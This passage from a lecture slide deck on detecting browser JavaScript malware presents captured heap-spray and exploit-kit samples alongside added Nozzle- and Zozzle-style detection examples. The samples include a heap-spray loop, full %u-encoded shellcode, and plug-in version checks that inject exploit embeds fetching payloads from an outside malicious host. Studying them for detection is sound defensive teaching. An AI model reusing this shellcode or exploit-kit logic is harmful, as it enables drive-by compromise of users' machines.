while (cTAfWBbz.length < EibcUrHC / xAFKNqwO) {   // grow the sled by doubling
  cTAfWBbz += cTAfWBbz;
}
var GBVpRAcd = cTAfWBbz.substring(0, EibcUrHC / xAFKNqwO);
delete cTAfWBbz;
for (JyxIaABZ = 0; JyxIaABZ < oKqMlPqL; JyxIaABZ++) {   // the spray: sled + shellcode in every block
  pbIkPrKa[JyxIaABZ] = GBVpRAcd + eSSOLKOd;
}
CollectGarbage();
var fseYOuUZ = unescape(TzsygYnD);
var wxDSxsOR = new Array();
for (var FNMszcqR = 0; FNMszcqR < wSqaQK; FNMszcqR++)
  wxDSxsOR.push(document.createElement("img"));
function FKOASMamskASDweqnbjdwasSDQWWQq() {
  vVLUmYRf = document.createElement("tbody");
  vVLUmYRf.click;

slide-81
SLIDE 81

See Anything in Common

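What the spray samples above have in common, made concrete. This is an added example, not code from the slides and not Nozzle's code: it rebuilds one sprayed block with the sample's own constants (0x100000, 2, 0x01020, 0xC0 and the "%u0C0C%u0C0C" sled), then runs the kind of check a heap scanner performs on allocated objects. Assumptions: the shellcode is the slide's truncated prefix, used only as a stand-in; the heap start address passed to sprayCovers is a hypothetical value; and the longest-run test is a deliberately crude substitute for what Nozzle actually does (disassembling objects and scoring reachable code).

```javascript
// Added example (not from the slides, not Nozzle's code): rebuild one sprayed
// block with the sample's own constants, then apply a simplified stand-in for
// a Nozzle-style heap check. Assumptions are marked below.

// %uXXXX decoding, the part of the browser's unescape() these samples rely on.
function decodeU(s) {
  return s.replace(/%u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// JS strings are UTF-16: each code unit is two little-endian bytes in memory,
// which is what a sprayed block looks like to the CPU.
function toBytes(str) {
  const out = new Uint8Array(str.length * 2);
  for (let i = 0; i < str.length; i++) {
    const c = str.charCodeAt(i);
    out[2 * i] = c & 0xff;
    out[2 * i + 1] = c >> 8;
  }
  return out;
}

// One block exactly as the sample builds it: a doubled-up sled, cut so that
// sled + shellcode + 0x1020 bytes of string overhead fills a 1 MB allocation.
function buildSprayBlock(shellcodeHex, sledHex = "%u0C0C%u0C0C") {
  const shellcode = decodeU(shellcodeHex);
  const allocSize = 0x100000, charSize = 2, overhead = 0x01020;   // the sample's constants
  const padBytes = allocSize - (shellcode.length * charSize + overhead);
  let sled = decodeU(sledHex);
  while (sled.length < padBytes / charSize) sled += sled;        // the doubling loop
  sled = sled.substring(0, padBytes / charSize);
  return sled + shellcode;
}

// Longest run of a single byte value in an object. A 0x0C sled (x86 "or al, 0x0C",
// executable at any offset) dominates a sprayed block; ordinary strings have no
// such run. Nozzle itself disassembles objects and scores reachable code, so
// this is a crude stand-in (assumption, not Nozzle's algorithm).
function longestRun(bytes) {
  let best = { value: -1, length: 0 };
  let cur = { value: bytes[0], length: 0 };
  for (const b of bytes) {
    if (b === cur.value) cur.length++;
    else cur = { value: b, length: 1 };
    if (cur.length > best.length) best = { value: cur.value, length: cur.length };
  }
  return best;
}

function looksLikeSpray(bytes, minSledFraction = 0.5) {
  return longestRun(bytes).length / bytes.length >= minSledFraction;
}

// Does 0xC0 blocks x 1 MB of spray reach the address the sled value encodes?
// heapStart is wherever the browser's heap happens to begin (assumed value in demo()).
function sprayCovers(target, heapStart, blocks = 0xC0, blockSize = 0x100000) {
  return heapStart <= target && target < heapStart + blocks * blockSize;
}

// The slide's shellcode is truncated; its visible prefix serves as a stand-in.
const SHELLCODE_PREFIX = "%u56e8%u0000%u5300%u5655%u8b57%u246c%u8b18%u3c45%u548b%u7805%uea01";

function demo() {
  const block = toBytes(buildSprayBlock(SHELLCODE_PREFIX));
  const run = longestRun(block);
  return {
    blockBytes: block.length,                       // 1044448: 1 MB minus the 0x1020 overhead
    sledBytes: run.length,                          // 1044426 bytes of 0x0C
    sledValue: run.value,                           // 12, i.e. 0x0C
    flagged: looksLikeSpray(block),                 // true
    covered: sprayCovers(0x0C0C0C0C, 0x00A00000),   // true for an assumed heap start of 10 MB
  };
}
```

The numbers fall out of the sample's arithmetic: every block is (0x100000 - 0x1020) / 2 = 522224 characters regardless of shellcode length, almost all of it sled, and 0xC0 such blocks put 192 MB of 0x0C bytes on the heap, enough to cover 0x0C0C0C0C from any heap start between roughly 0.75 MB and 192 MB.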

slide-82
SLIDE 82

How About This?

var zmn = null;
try { zmn = new ActiveXObject("AcroPDF.PDF"); } catch (e) {}                  // is the Adobe Reader plug-in present?
if (!zmn) { try { zmn = new ActiveXObject("PDF.PdfCtrl"); } catch (e) {} }
if (zmn) {
  // Reader version with the dots stripped ("8.1.2" -> 812); serve the PDF exploit to anything below 9.0.0 except 8.1.3
  lv = ((zmn.GetVersions().split(","))[4].split("="))[1].replace(/\./g, "");
  if ((lv < 900) && (lv != 813))
    document.write('<embed src="http://articles.koraja.com/showcat.php?cid=87&cn=Music+%26+MP3?s=EYq5g7Cg&id=2" width=100 height=100 type="application/pdf"></embed>');
}
try {
  var zmn = 0;
  zmn = (new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$" + "version").split(",");   // Flash 9 version fields
} catch (e) {}
if (zmn && (zmn[2] < 124))                                                    // build field below 124: serve the SWF exploit
  document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width=100 height=100 align=middle><param name="movie" value="http://articles.koraja.com/showcat.php?cid=87&cn=Music+%26+MP3?s=EYq5g7Cg&id=3"/><param name="quality" value="high"/><param name="bgcolor" value="#ffffff"/><embed src="http://articles.koraja.com/showcat.php?cid=87&cn=Music+%26+MP3?s=EYq5g7Cg&id=3"/></embed></object>');
// shellcode, %u-encoded
var scode = "%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1";
function ek13() { return true; }
window.onerror = ek13;                                                        // swallow script errors so a failed attempt stays silent
// the appended string is the payload URL, %u-encoded: http://articles.koraja.com/showcat.php?cid=87&cn=Music+%26+MP3?s=EYq5g7Cg&id=12 followed by a NUL
var scode1 = unescape(scode + "%u7468%u7074%u2F3A%u612F%u7472%u6369%u656C%u2E73%u6F6B%u6172%u616A%u632E%u6D6F%u732F%u6F68%u6377%u7461%u702E%u7068%u633F%u6469%u383D%u2637%u6E63%u4D3D%u7375%u6369%u252B%u3632%u4D2B%u3350%u733F%u453D%u7159%u6735%u4337%u2667%u6469%u313D%u0032");

slide-83
SLIDE 83

How About This?


slide-84
SLIDE 84

Detecting Internet Malware

Dynamic Detection: Nozzle

Nozzle: A Defense Against Heap-spraying Code Injection Attacks [Usenix Security 2009]

  • Scan heap-allocated objects to identify valid x86 code sequences

Static Detection: Zozzle

Zozzle: Low-overhead Mostly Static JavaScript Malware Detection [Usenix Security 2011]

  • Bayesian classification of hierarchical features of the JavaScript abstract syntax tree, in the browser (after unpacking)

[Chart: daily time series, x-axis 6/1/2011 to 6/29/2011; the plotted values are not recoverable from the slide text]
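Steps 1 to 3 of "How to Recognize JavaScript Malware?" carried through to Zozzle's classification step, as an added example that is not Zozzle's code. Zozzle's features are (context, text) pairs read off the abstract syntax tree, where the context is the enclosing construct (function, loop, try, if, ...); here the context is inferred from braces in the token stream instead of a real parser, which is an approximation. The training snippets are constructed for the example and the spray sample is the slide's own code shortened, so the result illustrates the method, not a trained model.

```javascript
// Added example (not Zozzle's code): a small Zozzle-style classifier over
// "context:token" features, with contexts inferred from braces (approximation)
// and a constructed training set.

const TOKEN_RE = /"(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*'|0x[0-9a-fA-F]+|\d+(?:\.\d+)?|[A-Za-z_$][\w$]*|[{}();]/g;
const CONTEXT_KEYWORDS = new Set(["function", "for", "while", "do", "try", "catch", "if", "else", "switch"]);

// The set of "context:token" features in a script. String literals become
// "<ctx>:string"; numbers are ignored; comments are not handled.
function extractFeatures(src) {
  const feats = new Set();
  const stack = ["top"];
  let pending = null, parens = 0;
  for (const tok of src.match(TOKEN_RE) || []) {
    const ctx = stack[stack.length - 1];
    if (tok === "{") { stack.push(pending || ctx); pending = null; }
    else if (tok === "}") { if (stack.length > 1) stack.pop(); }
    else if (tok === "(") parens++;
    else if (tok === ")") parens--;
    else if (tok === ";") { if (parens === 0) pending = null; }   // brace-less statement ended
    else if (tok[0] === '"' || tok[0] === "'") feats.add(ctx + ":string");
    else if (/^\d/.test(tok)) continue;
    else {
      feats.add(ctx + ":" + tok);
      if (CONTEXT_KEYWORDS.has(tok)) pending = tok;              // the next "{" opens this context
    }
  }
  return feats;
}

// Naive Bayes on feature presence, add-one smoothing.
function train(samples) {
  const model = { docs: {}, counts: {} };
  for (const { src, label } of samples) {
    model.docs[label] = (model.docs[label] || 0) + 1;
    const c = (model.counts[label] = model.counts[label] || {});
    for (const f of extractFeatures(src)) c[f] = (c[f] || 0) + 1;
  }
  return model;
}

function classify(model, src) {
  const feats = extractFeatures(src);
  const total = Object.values(model.docs).reduce((a, b) => a + b, 0);
  let best = null, bestScore = -Infinity;
  for (const label of Object.keys(model.docs)) {
    let score = Math.log(model.docs[label] / total);
    for (const f of feats) score += Math.log(((model.counts[label][f] || 0) + 1) / (model.docs[label] + 2));
    if (score > bestScore) { bestScore = score; best = label; }
  }
  return best;
}

// Constructed training set: step 1 (representative malware) and step 2 (what
// it shares: unescape, a doubling loop, an Array of blocks, CollectGarbage)
// against ordinary page scripts.
const TRAINING = [
  { label: "malicious", src: `var sc = unescape("%u9090%u9090"); var sled = unescape("%u0c0c%u0c0c"); while (sled.length < 0x80000) sled += sled; var a = new Array(); for (var i = 0; i < 200; i++) a[i] = sled + sc; document.write(sc);` },
  { label: "malicious", src: `function x() { var s = unescape("%uE8FC"); var p = new Array(); while (s.length < 0x40000) { s += s; } for (i = 0; i < 100; i++) p.push(s); } x();` },
  { label: "malicious", src: `try { var o = new ActiveXObject("AcroPDF.PDF"); } catch (e) {} if (o) { var z = unescape("%u0b0b"); while (z.length < 0x100000) z += z; eval(z); }` },
  { label: "malicious", src: `var m = new Array(); var h = unescape("%u4141%u4141"); for (var j = 0; j < 500; j++) { m[j] = h + h; } var q = document.createElement("img"); CollectGarbage();` },
  { label: "benign", src: `function init() { var el = document.getElementById("menu"); el.addEventListener("click", function (e) { e.preventDefault(); toggle(el); }); } init();` },
  { label: "benign", src: `var items = []; for (var i = 0; i < list.length; i++) { items.push(list[i].name); } document.getElementById("out").textContent = items.join(", ");` },
  { label: "benign", src: `function load(url) { var xhr = new XMLHttpRequest(); xhr.open("GET", url); xhr.onload = function () { render(JSON.parse(xhr.responseText)); }; xhr.send(); }` },
  { label: "benign", src: `var total = 0; while (queue.length > 0) { var job = queue.shift(); total += job.cost; } if (total > limit) { alert("over budget"); }` },
];
const MODEL = train(TRAINING);

// The slide's spray sample, shortened; the names are the sample's own.
const SPRAY_SAMPLE = `var MuqEZYdx = "%u56e8%u0000"; var avIztsbF = "%u0C0C%u0C0C"; var eSSOLKOd = unescape(MuqEZYdx); var pbIkPrKa = new Array(); var cTAfWBbz = unescape(avIztsbF); while (cTAfWBbz.length < 0x7F000) { cTAfWBbz += cTAfWBbz; } for (JyxIaABZ = 0; JyxIaABZ < 0xC0; JyxIaABZ++) { pbIkPrKa[JyxIaABZ] = cTAfWBbz + eSSOLKOd; } CollectGarbage();`;
```

The randomized identifiers (MuqEZYdx, cTAfWBbz, ...) never appear in training, so they contribute the same smoothed probability to both classes and cancel out; the verdict comes from the context-qualified tokens the spray shares with the malicious snippets (top:unescape, top:Array, top:CollectGarbage, a while loop at top level) rather than from any one string. That is why the classifier runs after unpacking: on the eval()-wrapped form it would see only the unpacker.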

slide-85
SLIDE 85
slide-86
SLIDE 86